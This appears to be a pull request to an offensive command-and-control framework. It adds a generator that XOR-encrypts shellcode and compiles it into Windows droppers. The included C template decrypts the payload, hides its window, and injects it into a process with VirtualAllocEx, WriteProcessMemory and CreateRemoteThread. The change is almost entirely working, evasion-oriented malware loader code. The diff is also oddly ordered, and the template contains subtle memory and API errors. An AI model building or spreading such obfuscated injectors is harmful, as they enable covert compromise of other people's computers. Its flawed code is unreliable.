### PR TITLE
Add XOR payload for Posh_v4_x64 using a key that can be configured in the project's config yaml file.

### DIFF
--- a/poshc2/server/Config.py
+++ b/poshc2/server/Config.py
@@ -138,3 +138,6 @@ Cert_CN = "P18055077"
 Cert_SerialNumber = 1000
 Cert_NotBefore = 0
 Cert_NotAfter = (10 * 365 * 24 * 60 * 60)
+
+#XOR encryption key
+XOR_KEY = bytes(config["XOR_KEY"], "utf-8")

--- a/poshc2/server/payloads/XOR-Payloads.py
+++ b/poshc2/server/payloads/XOR-Payloads.py
@@ -1,4 +1,5 @@
 from poshc2.server.Config import PayloadTemplatesDirectory, PayloadsDirectory, XOR_KEY
+from poshc2.server.payloads.Payloads import PayloadType
 from poshc2.Colours import Colours
 import subprocess
 
@@ -15,28 +16,43 @@ def xor(data, key):
 def c_char_arr(name, value):
     return 'char '+name+'[]'+'=''{0x' + ',0x'.join(hex(x)[2:] for x in value) + '};'
 
+def generate_xor_dropper(payloads, name, arch, payloadtype):
+    # Get the shellcode based on the architecture
+    with open(f"{PayloadsDirectory}{name}{payloadtype}_{arch}_Shellcode.bin", 'rb') as f:
+        shellcodesrc = f.read()
+
+    enc = xor(shellcodesrc, XOR_KEY)
+    shellcode = c_char_arr('sc', enc)
+
+    # Create the raw C file from the template
+    with open(f"{PayloadTemplatesDirectory}dropper.xor", 'r') as f:
+        content = f.read()
+
+    content = str(content).replace("#REPLACEME#", shellcode).replace("#REPLACE_XOR_KEY#", c_char_arr('key', XOR_KEY))
+    with open(f"{payloads.BaseDirectory}{name}{payloadtype}_{arch}_xor.c", 'w') as f:
+        f.write(content)
+
+    payloads.QuickstartLog(Colours.END)
+    payloads.QuickstartLog(f"XORed shellcode Payload written to: {payloads.BaseDirectory}{name}{payloadtype}_{arch}_xor.c")
+
+    if arch == "x64":
+        compiler = "x86_64-w64-mingw32-gcc"
+    elif arch == "x86":
+        compiler = "i686-w64-mingw32-gcc"
+    else:
+        payloads.QuickstartLog("ERROR: verify the architecture")
+        return
+
+    subprocess.check_output(f"{compiler} -s -w {payloads.BaseDirectory}{name}{payloadtype}_{arch}_xor.c -o {payloads.BaseDirectory}{name}{payloadtype}_{arch}_xor.exe", shell=True)
+
+    payloads.QuickstartLog(Colours.END)
+    payloads.QuickstartLog(f"exe Payload written to: {payloads.BaseDirectory}{name}{payloadtype}_{arch}_xor.exe")
+
 def create_payloads(payloads, name):
 
-    archs = ["x64"]
+    archs = ["x86", "x64"]
+    compiler = ""
+
     for arch in archs:
-        # Get the shellcode based on the architecture
-        with open("%s%sPosh_v4_%s_Shellcode.bin" % (PayloadsDirectory, name, arch), 'rb') as f:
-            shellcodesrc = f.read()
-
-        enc = xor(shellcodesrc, XOR_KEY)
-        shellcode = c_char_arr('sc', enc)
-
-        # Create the raw C file from the template
-        with open(f"{PayloadTemplatesDirectory}dropper.xor", 'r') as f:
-            content = f.read()
-
-        content = str(content).replace("#REPLACEME#", shellcode).replace("#REPLACE_XOR_KEY#", c_char_arr('key', XOR_KEY))
-        with open(f"{payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.c", 'w') as f:
-            f.write(content)
-
-        payloads.QuickstartLog(Colours.END)
-        payloads.QuickstartLog(f"XORed shellcode Payload written to: {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.c")
-
-        subprocess.check_output(f"x86_64-w64-mingw32-gcc -s -w {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.c -o {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.exe", shell=True)
-        payloads.QuickstartLog(Colours.END)
-        payloads.QuickstartLog(f"exe Payload written to: {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.exe")
+        for payloadtype in PayloadType:
+            generate_xor_dropper(payloads, name, arch, payloadtype.value)

--- a/poshc2/server/payloads/XOR-Payloads.py
+++ b/poshc2/server/payloads/XOR-Payloads.py
@@ -1,0 +1,42 @@
+from poshc2.server.Config import PayloadTemplatesDirectory, PayloadsDirectory, XOR_KEY
+from poshc2.Colours import Colours
+import subprocess
+
+def xor(data, key):
+    key = key
+    output = []
+    for i in range(len(data)):
+        current = data[i]
+        current_key = key[i % len(key)]
+        output.append(current ^ current_key)
+
+    return output
+
+def c_char_arr(name, value):
+    return 'char '+name+'[]'+'=''{0x' + ',0x'.join(hex(x)[2:] for x in value) + '};'
+
+def create_payloads(payloads, name):
+
+    archs = ["x64"]
+    for arch in archs:
+        # Get the shellcode based on the architecture
+        with open("%s%sPosh_v4_%s_Shellcode.bin" % (PayloadsDirectory, name, arch), 'rb') as f:
+            shellcodesrc = f.read()
+
+        enc = xor(shellcodesrc, XOR_KEY)
+        shellcode = c_char_arr('sc', enc)
+
+        # Create the raw C file from the template
+        with open(f"{PayloadTemplatesDirectory}dropper.xor", 'r') as f:
+            content = f.read()
+
+        content = str(content).replace("#REPLACEME#", shellcode).replace("#REPLACE_XOR_KEY#", c_char_arr('key', XOR_KEY))
+        with open(f"{payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.c", 'w') as f:
+            f.write(content)
+
+        payloads.QuickstartLog(Colours.END)
+        payloads.QuickstartLog(f"XORed shellcode Payload written to: {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.c")
+
+        subprocess.check_output(f"x86_64-w64-mingw32-gcc -s -w {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.c -o {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.exe", shell=True)
+        payloads.QuickstartLog(Colours.END)
+        payloads.QuickstartLog(f"exe Payload written to: {payloads.BaseDirectory}{name}Posh_v4_{arch}_xor.exe")

--- a/resources/config-template.yml
+++ b/resources/config-template.yml
@@ -43,7 +43,7 @@ Slack_UserID: "" # Found under a users profile (i.e UHEJYT2AA). Can also be "cha
 Slack_Channel: "" # i.e #bots
 
 # SOCKS Proxying Options
-SocksHost: "http://127.0.0.1:49031"
+SocksHost: "http://127.0.0.1:49031" # The host the C2 http requests communicate with - not the port the SOCKS client connects to. Most cases should be left like this and set in rewrite rules.
 
 # PBind Options
 PBindPipeName: "jaccdpqnvbrrxlaf"
@@ -51,3 +51,6 @@ PBindSecret: "mtkn4"
 
 # FComm Options
 FCommFileName: "C:\\Users\\Public\\Public.ost"
+
+# XOR key
+XOR_KEY: "random_alphanum_key_goes_here"

--- a/resources/payload-templates/dropper.xor
+++ b/resources/payload-templates/dropper.xor
@@ -1,0 +1,62 @@
+#include<windows.h>
+
+#REPLACEME#
+
+void XOR(char* cipher, size_t cipher_len, char* key, size_t key_len) {
+        for (int x = 0; x < cipher_len; x++)
+        {
+                cipher[x] ^= key[x % key_len];
+        }
+        cipher[cipher_len] = 0;
+}
+
+void migrate(DWORD);
+
+
+int main(int argc, char *argv[])
+{
+    STARTUPINFO si = { sizeof(STARTUPINFO) };
+    si.cb = sizeof(si);
+    si.dwFlags = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_HIDE;
+    PROCESS_INFORMATION pi= {0};
+    int processID = GetCurrentProcessId();
+
+    #REPLACE_XOR_KEY#
+    XOR((char*)sc, sizeof(sc), key, sizeof(key));
+
+    migrate(processID);
+    while(1) {Sleep(50000);}
+    return 0;
+}
+
+
+void migrate(DWORD dwProcessID) {
+     HANDLE hP;
+     HANDLE hRT;
+     PVOID pRB;
+
+     DWORD opr = PAGE_READWRITE;
+     BOOL vp;
+
+     if(!dwProcessID) {
+        exit(0);
+     }
+     hP = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
+     if(!hP) {
+        exit(0);
+     }
+     pRB = VirtualAllocEx(hP, NULL, sizeof(sc), MEM_COMMIT, PAGE_READWRITE);
+     //pRB = VirtualAllocEx(hP, NULL, sizeof(sc), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+     if (!pRB) {
+        exit(0);
+     }
+     vp = VirtualProtect(pRB, sizeof(sc), PAGE_EXECUTE_READWRITE, &opr);
+     if (vp){
+     if (!WriteProcessMemory(hP, pRB, sc, sizeof(sc), NULL)) {
+        exit(0);
+     }
+     CreateRemoteThread(hP, NULL, 0, pRB, NULL, 0, NULL);
+     CloseHandle(hP);
+     }
+}


### PR DESCRIPTION
Add XOR payload for Posh_v4_x64 using a key that can be configured in the project's config yaml file.

The payload can be extended to support other shellcodes. For the moment, I only tested Posh_v4_x64.